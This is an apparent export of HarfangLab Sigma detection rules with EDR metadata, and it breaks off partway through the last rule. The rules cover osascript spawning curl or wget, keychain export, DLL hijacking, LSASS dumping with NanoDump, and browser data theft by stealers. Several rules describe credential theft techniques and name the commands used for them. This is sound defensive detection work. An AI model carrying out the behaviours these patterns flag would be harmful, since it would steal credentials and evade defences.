"content": "title: Suspicious Program Spawned by Osascript\nid: 94503606-01d9-4e36-b05c-7ddbadadf645\ndescription: |\n Detects a suspicious program being spawned by osascript.\n An attacker could use Apple Script and execute other programs like python or ruby to achieve various behaviors like a reverse shell.\n It is recommended to investigate the program spawned by the script and the script itself to determine whether this action was legitimate.\nreferences:\n - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\n - https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6\n - https://attack.mitre.org/techniques/T1059/002/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.defense_evasion\n - attack.t1222.002\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - attack.command_and_control\n - attack.t1105\n - attack.discovery\n - attack.t1057\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Osascript\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_ancestors:\n Ancestors|contains: '/osascript'\n\n selection_descendants_lolbins:\n Image|endswith:\n - '/ditto'\n - '/zip'\n - '/curl'\n - '/wget'\n - '/cp'\n - '/mv'\n - '/cat'\n - '/dscl'\n - '/mdls'\n - '/security'\n - '/system_profiler'\n - '/sw_vers'\n - '/dscacheutil'\n - '/csrutil'\n - '/netstat'\n - '/who'\n - '/preintenv'\n - '/smbutil'\n - '/shownmount'\n - '/dseditgroup'\n - '/kcc'\n - '/mkpassdb'\n - '/dsenableroot'\n - '/grep'\n - '/ls'\n - '/ldapsearch'\n - '/nohup'\n - '/ps'\n - '/logname'\n\n selection_descendants_chmod:\n Image|endswith: '/chmod'\n CommandLine|contains: ' +x '\n\n exclusion_cellar:\n Image: '/bin/cat'\n Ancestors|contains:\n - '/opt/homebrew/Cellar/gopass-jsonapi/'\n - '/opt/homebrew/Cellar/gopass/'\n\n exclusion_globalprotect:\n - 
Ancestors|contains: '/Applications/GlobalProtect.app/Contents/Resources/PanGpHip'\n - CommandLine: '/usr/bin/grep -e state = -e path = -e SERVICE_NAME'\n\n exclusion_openoffice:\n CommandLine: 'grep ^ProductKey=LibreOffice * /Applications/LibreOffice.app/Contents/Resources/bootstraprc'\n ParentCommandLine: 'osascript /private/var/folders/*/LibreOffice Language Pack.app/Contents/Resources/osx_install.applescript'\n\n exclusion_pkinstallsandbox:\n GrandparentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox'\n - '/usr/bin/osascript /tmp/PKInstallSandbox'\n\n exclusion_postinstall:\n GrandparentCommandLine: 'bash -x postinstall'\n ParentCommandLine: 'bash -x postinstall'\n\n condition: selection_ancestors and 1 of selection_descendants_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "94503606-01d9-4e36-b05c-7ddbadadf645",
"rule_name": "Suspicious Program Spawned by Osascript",
"rule_description": "Detects a suspicious program being spawned by osascript.\nAn attacker could use Apple Script and execute other programs like python or ruby to achieve various behaviors like a reverse shell.\nIt is recommended to investigate the program spawned by the script and the script itself to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-04-15",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1057",
"attack.t1105",
"attack.t1119",
"attack.t1222.002",
"attack.t1560.001",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "94773690-ba2b-43cc-b7fc-ad9eb6bee0ba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294661Z",
"creation_date": "2026-03-23T11:45:35.294663Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294668Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md",
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_keychain_export_find_certificate.yml",
"content": "title: MacOS Keychain Exported via Find Certificate\nid: 94773690-ba2b-43cc-b7fc-ad9eb6bee0ba\ndescription: |\n Detects the macOS Keychain being exported via security using the find-certificate command.\n Keychain (or Keychain Services) is the macOS credential management system.\n Attackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\n It is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2022/08/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security find-certificate -a -p\n Image: '/usr/bin/security'\n CommandLine|contains: 'find-certificate'\n ParentImage|contains: '?'\n\n # Git LFS seems to use keychain.\n exclusion_git_lfs:\n ParentImage|endswith: '/bin/git-lfs'\n CommandLine|contains|all:\n - 'find-certificate'\n - '/Library/Keychains/System.keychain'\n\n # Visual Studio Code is expected to use keychain.\n exclusion_vs_code:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper (Plugin)'\n - '/Applications/Visual Studio 
Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Users/*/.vscode/extensions/sonarsource.sonarlint-vscode-*-*/*/*/bin/java'\n - '/Users/*/.vscode-insiders/extensions/sonarsource.sonarlint-vscode-*-*/*/*-*/bin/java'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/MacOS/Electron'\n CommandLine|contains: 'security find-certificate -a -p'\n\n exclusion_glpi:\n ParentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_docker:\n - ParentImage: '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n GrandparentImage:\n - '/Applications/Docker.app/Contents/MacOS/Docker'\n - '/sbin/launchd'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n\n exclusion_node:\n ParentImage: '/Users/*/.nvm/versions/node/v*/bin/node'\n\n exclusion_fortinet:\n ParentImage:\n - '/Library/Application Support/Fortinet/FortiClient/bin/epctrl'\n - '/Library/Application Support/Fortinet/FortiClient/bin/ztagent'\n\n exclusion_postman:\n ParentImage: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_lens:\n ParentImage: '/Applications/Lens.app/Contents/MacOS/Lens'\n\n exclusion_ruby:\n ParentImage:\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/System/Library/Frameworks/Ruby.framework/Versions/*/usr/bin/ruby'\n\n exclusion_azure:\n ParentImage: '/Applications/Azure Data Studio.app/Contents/Frameworks/Azure Data Studio Helper (Plugin).app/Contents/MacOS/Azure Data Studio Helper (Plugin)'\n\n exclusion_openvpn:\n GrandparentImage: '/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect'\n\n exclusion_rider:\n ParentImage: '/users/*/applications/rider.app/contents/macos/rider'\n\n exclusion_intellij:\n ParentImage:\n - '/Applications/IntelliJ IDEA.app/Contents/MacOS/idea'\n - '/Users/*/Library/Application Support/JetBrains/IntelliJIdea*'\n\n 
exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "94773690-ba2b-43cc-b7fc-ad9eb6bee0ba",
"rule_name": "MacOS Keychain Exported via Find Certificate",
"rule_description": "Detects the macOS Keychain being exported via security using the find-certificate command.\nKeychain (or Keychain Services) is the macOS credential management system.\nAttackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\nIt is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\n",
"rule_creation_date": "2022-08-29",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9521e40e-07f4-4dfe-b9e7-6e1b287ab459",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089650Z",
"creation_date": "2026-03-23T11:45:34.089652Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089657Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_coccocupdate.yml",
"content": "title: DLL Hijacking via CocCocUpdate.exe\nid: 9521e40e-07f4-4dfe-b9e7-6e1b287ab459\ndescription: |\n Detects potential Windows DLL Hijacking via CocCocUpdate.exe related to Coc Coc Browser Update Software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CocCocUpdate.exe'\n ImageLoaded|endswith: '\\coccocpdate.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\CocCoc\\'\n - '?:\\Program Files (x86)\\CocCoc\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\CocCoc\\'\n - '?:\\Program Files (x86)\\CocCoc\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'COC COC COMPANY LIMITED'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9521e40e-07f4-4dfe-b9e7-6e1b287ab459",
"rule_name": "DLL Hijacking via CocCocUpdate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CocCocUpdate.exe related to Coc Coc Browser Update Software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95488005-c881-4387-9e17-b146f890aa19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085568Z",
"creation_date": "2026-03-23T11:45:34.085570Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085574Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudsek.com/blog/technical-analysis-of-the-redline-stealer",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_012_sus_regsvcs_net_comm.yml",
"content": "title: Suspicious RegSvcs.exe Network Communication\nid: 95488005-c881-4387-9e17-b146f890aa19\ndescription: |\n Detects a network communication to an external IP address from RegSvcs.exe.\n This can be the result of the loading of a malicious .NET COM object with RegSvcs.exe as a way to bypass defenses. It is commonly used by various malware such as Redline Stealer.\n It is recommended to investigate the parent processes of the detected process and the destination IP address to determine the legitimacy of this behavior.\n If there is no parent process, look for any other alerts indicating the establishment of persistence or reads on sensitive files.\nreferences:\n - https://www.cloudsek.com/blog/technical-analysis-of-the-redline-stealer\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/09/27\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - attack.command_and_control\n - attack.t1571\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.LOLBin.RegSvcs\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\RegSvcs.exe'\n - ProcessOriginalFileName: 'RegSvcs.exe'\n\n filter_remote_ip_cidr:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - 'fe80::/10'\n - '100.64.0.0/10' # RFC6598\n\n filter_remote_ip_pattern:\n DestinationIp:\n - '' # Empty\n - '::1'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95488005-c881-4387-9e17-b146f890aa19",
"rule_name": "Suspicious RegSvcs.exe Network Communication",
"rule_description": "Detects a network communication to an external IP address from RegSvcs.exe.\nThis can be the result of the loading of a malicious .NET COM object with RegSvcs.exe as a way to bypass defenses. It is commonly used by various malware such as Redline Stealer.\nIt is recommended to investigate the parent processes of the detected process and the destination IP address to determine the legitimacy of this behavior.\nIf there is no parent process, look for any other alerts indicating the establishment of persistence or reads on sensitive files.\n",
"rule_creation_date": "2024-09-27",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9551f323-b5d9-4aaf-a46f-43581397ac81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095329Z",
"creation_date": "2026-03-23T11:45:34.095331Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095335Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/helpsystems/nanodump/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_file_nanodump.yml",
"content": "title: LSASS Memory Dumped via NanoDump\nid: 9551f323-b5d9-4aaf-a46f-43581397ac81\ndescription: |\n Detects an attempt to dump the LSASS process memory using the NanoDump tool.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\n It is recommended to analyze the parent process for malicious content.\nreferences:\n - https://github.com/helpsystems/nanodump/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/11/30\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.Filesystem\n - classification.Windows.HackTool.NanoDump\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\\\*_??????????_lsass.dmp'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9551f323-b5d9-4aaf-a46f-43581397ac81",
"rule_name": "LSASS Memory Dumped via NanoDump",
"rule_description": "Detects an attempt to dump the LSASS process memory using the NanoDump tool.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nAfter a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\nIt is recommended to analyze the parent process for malicious content.\n",
"rule_creation_date": "2021-11-30",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "955e6d93-f3e3-4d66-8187-cb8496828588",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612432Z",
"creation_date": "2026-03-23T11:45:34.612436Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612443Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_groupadd_linux.yml",
"content": "title: Group Created via groupadd\nid: 955e6d93-f3e3-4d66-8187-cb8496828588\ndescription: |\n Detects a suspicious attempt to create a new group.\n Adversaries may create new groups to hide their activity or achieve persistence.\n It is recommended to check the created group for malicious intent and to analyze the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2025/05/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/groupadd'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|/usr/bin/apt|'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* 
/usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python? /usr/dnf'\n - '/usr/bin/python? /usr/bin/dnf'\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python?.? /bin/dnf'\n - '/usr/bin/python?.? /usr/bin/dnf'\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - '/usr/libexec/platform-python /bin/dnf'\n - '/usr/libexec/platform-python /usr/bin/dnf'\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessParentCommandLine|contains: ' /var/tmp/rpm-tmp'\n ProcessCommandLine: 'groupadd -r nxlog'\n\n exclusion_puppet:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n exclusion_containers:\n Ancestors|contains:\n - '/bin/dockerd|'\n - '|/usr/bin/systemd-nspawn|'\n - '/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/podman|'\n\n exclusion_eset:\n Ancestors|endswith: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|/usr/lib/systemd/systemd'\n\n exclusion_trendmicro:\n CommandLine: '/usr/sbin/groupadd -f tm_xes'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n condition: selection and not 1 of exclusion_*\nlevel: 
low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "955e6d93-f3e3-4d66-8187-cb8496828588",
"rule_name": "Group Created via groupadd",
"rule_description": "Detects a suspicious attempt to create a new group.\nAdversaries may create new groups to hide their activity or achieve persistence.\nIt is recommended to check the created group for malicious intent and to analyze the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2025-05-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9584cb1b-7b89-49ee-82d2-5cf2f2cef3fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587101Z",
"creation_date": "2026-03-23T11:45:34.587104Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587112Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/",
"https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_generic_stealer_browser_data_accessed.yml",
"content": "title: Browser Data Read by Unusual Process\nid: 9584cb1b-7b89-49ee-82d2-5cf2f2cef3fd\ndescription: |\n Detects an attempt to read browser data files from an unusual process.\n This may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\n It is recommended to investigate the process performing this action to determine its legitimacy.\n If you assume this to be a breach, it is recommended to perform an investigation to determine the specific malware used, what information has been exfiltrated and change the credentials of the affected users.\n Further information about different stealers is present in the references.\nreferences:\n - https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/\n - https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf\n - https://attack.mitre.org/techniques/T1005/\ndate: 2023/05/04\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1185\n - attack.discovery\n - attack.t1217\n - attack.privilege_escalation\n - attack.t1555.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Stealer.Generic\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: 